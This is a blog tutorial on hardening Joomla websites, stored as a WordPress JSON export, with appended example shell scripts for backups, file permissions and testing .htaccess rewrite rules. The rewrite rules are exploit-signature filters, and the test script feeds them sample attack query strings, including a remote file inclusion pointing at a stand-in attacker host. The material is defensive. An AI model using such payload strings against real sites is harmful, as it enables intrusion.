{"id":2537,"date":"2013-11-16T20:56:31","date_gmt":"2013-11-16T20:56:31","guid":{"rendered":"http:\/\/wordpress-23193-50017-134264.cloudwaysapps.com\/?p=2537"},"modified":"2013-11-16T20:59:11","modified_gmt":"2013-11-16T20:59:11","slug":"12-tips-and-tricks-to-enhance-joomla-security","status":"publish","type":"post","link":"https:\/\/www.digitb.com\/12-tips-and-tricks-to-enhance-joomla-security\/","title":{"rendered":"12 tips and tricks to enhance Joomla Security"},"content":{"rendered":"
Joomla is one of the most popular website Content Management Systems (CMS). With millions of Joomla websites online and thousands more being built every day, it isn't surprising that many hackers want to attack it. In fact, many Joomla websites have been defaced simply because their administrators neglected basic hardening.<\/p>\n
However, you don't need to worry!
In this tutorial we will show you several tips and neat tricks that will keep your Joomla website safe.<\/p>\n
1. Backup early and often<\/h4>\n
Make a recovery plan before your site is visited by hackers, not after. Always remember: "backup early and often" to protect your data. Back up both the files and the database, keep the copies off the web server, and test a restore at least once, because an untested backup is only a hope. A tested backup gives you the certainty that if something goes wrong with your Joomla website you can put it back at any time; then, instead of rebuilding from scratch, you only need to find and close the vulnerability that was used.<\/p>\n
2. Upgrade to a supported Joomla version<\/h4>\n
If your website is running Joomla 1.0 or 1.5, upgrade to Joomla 2.5 or 3.x. Those old branches no longer receive security fixes, and the newer releases contain many security improvements in the core of the application. Proceed with caution: always back up your Joomla site before starting the upgrade. For more information, see the Joomla tutorial.<\/p>\n
3. Careful management of installed extensions<\/h4>\n
Third-party extensions are what make Joomla so popular, but every extension is also a way into your website: most published Joomla vulnerabilities are in third-party extensions, not in the core. Make sure of the following steps:
– Run a code review (or at least a quick inspection for obvious problems such as unescaped user input and unchecked file uploads) of any extension you install.
– Review the Vulnerable Extensions List and make sure that none of the third-party extensions and versions you use appear on it.
– Update and patch extensions as soon as fixes are released; every extension has its own update cycle, separate from the Joomla core.
Remember that an unsafe extension can compromise your entire website, because it runs with the same file and database privileges as Joomla itself.<\/p>\n
4. Remove unused files and extensions<\/h4>\n
Before installing an extension, consider whether you really need it. Extensions that are installed but never used are not only a weakness but also garbage on your website: their files stay on the server, and any vulnerability in them may still be reachable even when the extension is disabled. Use the uninstall function in the Extension Manager to get rid of them completely; disabling an extension leaves its files behind, and deleting the folder by hand leaves database entries behind.<\/p>\n
5. Password protection<\/h4>\n
Hackers usually go for weak passwords. Use long, unique passwords containing uppercase, lowercase, numbers and special characters for every account that touches the site: the Joomla Super User, FTP\/SSH, the hosting control panel and the database user. Change them regularly and never reuse them across sites.
The database is just as important. A SQL injection in a vulnerable extension, or any other attack that reaches the database, runs with the privileges of the MySQL user stored in configuration.php and can wipe out all of your work. Protect database access at the MySQL level: create a dedicated user for the site, grant it privileges on the Joomla database only (never use root), and allow it to connect only from localhost or the web server's address.<\/p>\n
6. Use search engine friendly URLs<\/h4>\n
Always enable search engine friendly (SEF) URLs in Global Configuration. This not only improves your website's Google ranking but also prevents hackers from using Google's search results against you: raw URLs such as index.php?option=com_example&view=item expose the names of the components you run, so an attacker can find every site using a vulnerable component with a single search query. SEF URLs hide those names. Note that this is obscurity only; it makes your site harder to find, it does not fix the vulnerable component.<\/p>\n
7. Change the URL of the administration area<\/h4>\n
The standard Joomla administrator address is http:\/\/www.yoursite.com\/administrator, which every bot knows. Joomla does not support renaming that folder, but you can require a secret key before the login page is served, so that the backend only answers to a URL such as http:\/\/www.yoursite.com\/administrator?wewroi4459 and returns an error or a redirect to everyone else. This is done with a small administrator-protection extension or with a rewrite rule in .htaccess. Stronger options are to restrict \/administrator to your own IP addresses or to put HTTP authentication in front of it, and to always serve it over HTTPS.<\/p>\n
8. Remove version numbers and names of extensions<\/h4>\n
Most vulnerabilities only affect a specific release of a specific extension. This is why you should remove any information about the version number of the extensions you have installed: showing "My Extension version 2.5" in the page tells an attacker exactly which exploit to use. Modify that message so that it shows only the extension's name, or nothing at all (typically in the extension's template or language file). Removing the version number can prevent an attack before it happens, but treat it as defence in depth, not a fix: fingerprinting is still possible from other public files (for example administrator\/manifests\/files\/joomla.xml reveals the Joomla version), so keep the extension updated as well.<\/p>\n
9. Use the correct CHMOD for each folder and file<\/h4>\n
Setting a file or folder to a CHMOD of 777 or 707 makes it writable by every account on the server, and it is only ever needed when a script must write to that file or directory on a badly configured host. On a host where PHP runs as your own user (suPHP, FastCGI or PHP-FPM) it is never needed. All other files should have the following permissions:
\u2022 PHP and other files: 644
\u2022 Folders: 755
\u2022 configuration.php: 444 (read-only) once the site is set up; make it 644 only while you save changes in Global Configuration, then lock it again
Never leave configuration.php at 666: it contains the database password, and world-writable means any other account on a shared server can change it.<\/p>\n
10. Change your .htaccess file<\/h4>\n
Joomla ships with an htaccess.txt that you rename to .htaccess. It contains the rewrite rules below, which refuse requests whose query string carries the signatures of some well-known exploits against old Joomla and Mambo components. Make sure they are present, and keep in mind what they are: a crude pattern filter, not a web application firewall. %{QUERY_STRING} is matched exactly as sent, without URL decoding, so each rule has to list every encoding of the characters it looks for, and a payload encoded differently slips through.
########## Begin - Rewrite rules to block out some common exploits
#
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a &lt;script&gt; tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script that tries to set CONFIG_EXT (com_extcal2 issue)
RewriteCond %{QUERY_STRING} CONFIG_EXT(\[|\%20|\%5B).*= [NC,OR]
# Block out any script that tries to set sbp or sb_authorname via URL (simpleboard)
RewriteCond %{QUERY_STRING} sbp(=|\%20|\%3D) [OR]
RewriteCond %{QUERY_STRING} sb_authorname(=|\%20|\%3D)
# Reject every request matched above with 403 Forbidden (the [F] flag;
# the index.php target is ignored, nothing is sent to the homepage)
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits<\/p>\n
11. Turn off register_globals<\/h4>\n
register_globals turns every request parameter into a PHP variable, which is exactly what the mosConfig_ and GLOBALS rules above are defending against; Joomla 1.5 and later do not need it and run fine without it. Turn it off by setting register_globals = Off in php.ini. On shared hosting you often cannot edit the server's php.ini; in that case put php_flag register_globals off in the .htaccess in the root directory of your domain (when PHP runs as an Apache module), or register_globals = Off in a php.ini or .user.ini in that directory (when it runs as CGI or FastCGI). Be aware that very old scripts that still rely on register_globals will stop working once it is off, so check the other programs you run on the same website. On PHP 5.4 and later the setting no longer exists and there is nothing to turn off.<\/p>\n
12. Review and act on the Security Checklist<\/h4>\n
These checklists point you in the right direction and cover the typical security problems of a Joomla installation. Make sure you have worked through every step on them, and go back to them after each upgrade.<\/p>\n
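The backup routine from tip 1 in script form, as an added example that is not part of the original post and not a Joomla tool. It reads the database settings straight out of configuration.php (so the password is never typed on the command line), dumps the database with mysqldump and archives the site files. The site root and the destination directory are assumptions; run it from cron and copy the archives off the server.

```shell
#!/bin/sh
# Added example: back up a Joomla site (database + files) using the
# credentials already stored in configuration.php.
# Assumptions: mysqldump, tar and gzip on the PATH, and a destination
# directory outside the web root (both paths below are illustrative).

# Read one setting from configuration.php, e.g. joomla_config_value cfg db
# Lines look like:   public $db = 'joomla_site';   (or "var $db" on 1.5)
# A password containing a single quote is not handled by this simple sed.
joomla_config_value() {
    sed -n "s/^[[:space:]]*[a-z]* \\\$$2 = '\([^']*\)';.*/\1/p" "$1" | head -n 1
}

# Dump the database and archive the files into $2, stamped with the time.
joomla_backup() {
    root=$1
    dest=$2
    cfg=$root/configuration.php
    stamp=$(date +%Y%m%d-%H%M%S)
    db=$(joomla_config_value "$cfg" db)
    user=$(joomla_config_value "$cfg" user)
    pass=$(joomla_config_value "$cfg" password)
    host=$(joomla_config_value "$cfg" host)
    mkdir -p "$dest"
    chmod 700 "$dest"            # the dump contains every user record and hash
    # MYSQL_PWD keeps the password out of the process list, where other
    # users on a shared server could read it with ps.
    MYSQL_PWD=$pass mysqldump --single-transaction -h "$host" -u "$user" "$db" \
        > "$dest/db-$stamp.sql" || return 1
    gzip -f "$dest/db-$stamp.sql" || return 1
    tar -czf "$dest/files-$stamp.tar.gz" -C "$(dirname "$root")" "$(basename "$root")" || return 1
    echo "backup written to $dest (db-$stamp.sql.gz, files-$stamp.tar.gz)"
}

# Usage (assumed paths):  sh joomla-backup.sh /var/www/joomla /var/backups/joomla
if [ $# -eq 2 ]; then
    joomla_backup "$1" "$2"
fi
```

The dump is written with --single-transaction so InnoDB tables are copied consistently while the site stays online; restore it with mysql and unpack the tar archive over a clean Joomla tree, then re-check the permissions from tip 9.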
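The permission rules from tip 9 as a script you can run on the site, added here as an example; it is not part of the original post or of Joomla. The first function lists everything that is world-writable (the weakness a CHMOD of 777 or 707 introduces), the second normalises folders to 755 and files to 644 and locks configuration.php at 444. The site root is an assumption.

```shell
#!/bin/sh
# Added example: audit and fix Joomla file permissions
# (folders 755, files 644, configuration.php 444). Paths are illustrative.

# Print the octal permission bits of a path (GNU stat, BSD stat fallback).
perm_of() {
    stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1"
}

# List world-writable files and directories under $1, one path per line.
# -perm -002 = "the other-write bit is set", which is what 777, 707 and 666 do.
joomla_world_writable() {
    find "$1" -perm -002 \( -type f -o -type d \) -print
}

# Normalise permissions under $1 and lock configuration.php.
joomla_fix_perms() {
    root=$1
    find "$root" -type d ! -perm 755 -exec chmod 755 {} +
    find "$root" -type f ! -perm 644 -exec chmod 644 {} +
    # configuration.php holds the database password: read-only once the
    # site is set up (chmod 644 only while saving Global Configuration).
    if [ -f "$root/configuration.php" ]; then
        chmod 444 "$root/configuration.php"
    fi
    return 0
}

# Usage (assumed path):  sh joomla-perms.sh /var/www/joomla
if [ $# -eq 1 ]; then
    echo "world-writable before fix:"
    joomla_world_writable "$1"
    joomla_fix_perms "$1"
    echo "world-writable after fix:"
    joomla_world_writable "$1"
fi
```

Run the audit function alone first; if it lists folders such as images, cache, logs or tmp that a badly configured host really needs writable, fix the host (run PHP as your own user) rather than keeping 777.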
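The rewrite rules in tip 10 are only as good as the patterns in them. As an added example, not taken from the original post or from Joomla, the shell function below re-applies the five core patterns with grep -E to a list of constructed query strings, so you can see offline what they do and do not catch. The last case shows the limit: the base64_encode rule wants literal parentheses, so an attacker who percent-encodes them (PHP decodes %28 and %29 back before the script sees them) is not blocked.

```shell
#!/bin/sh
# Added example: the core query-string patterns from Joomla's .htaccess,
# re-applied with grep -E so they can be tested against sample query
# strings. Every query string below is constructed for this example.

# Return 0 (blocked, Apache would answer 403) if $1, a raw query string,
# matches any rule, else 1. Apache matches %{QUERY_STRING} without URL
# decoding, so the patterns themselves list the encodings they catch.
query_blocked() {
    qs=$1
    printf '%s\n' "$qs" | grep -Eq 'mosConfig_[a-zA-Z_]{1,21}(=|%3D)' && return 0
    printf '%s\n' "$qs" | grep -Eq 'base64_encode.*\(.*\)'           && return 0
    printf '%s\n' "$qs" | grep -Eqi '(<|%3C).*script.*(>|%3E)'       && return 0  # the only [NC] rule
    printf '%s\n' "$qs" | grep -Eq 'GLOBALS(=|\[|%[0-9A-Z]{0,2})'    && return 0
    printf '%s\n' "$qs" | grep -Eq '_REQUEST(=|\[|%[0-9A-Z]{0,2})'   && return 0
    return 1
}

# Run the rules over a constructed list, one query string per line, and
# print the status Apache would return followed by the query string.
demo_queries() {
    while IFS= read -r q; do
        if query_blocked "$q"; then echo "403 $q"; else echo "200 $q"; fi
    done <<'EOF'
option=com_content&view=article&id=5
mosConfig_absolute_path=http://attacker.example/shell.txt?
q=%3Cscript%3Ealert(1)%3C%2Fscript%3E
GLOBALS%5BmosConfig_absolute_path%5D=1
x=base64_encode(abc)
x=base64_encode%28abc%29
EOF
}

demo_queries
```

Four of the six lines come back as 403; the normal article URL and the percent-encoded base64_encode call both pass. The rules are worth keeping because they cost nothing, but a fixed component, not a pattern, is what actually closes the hole.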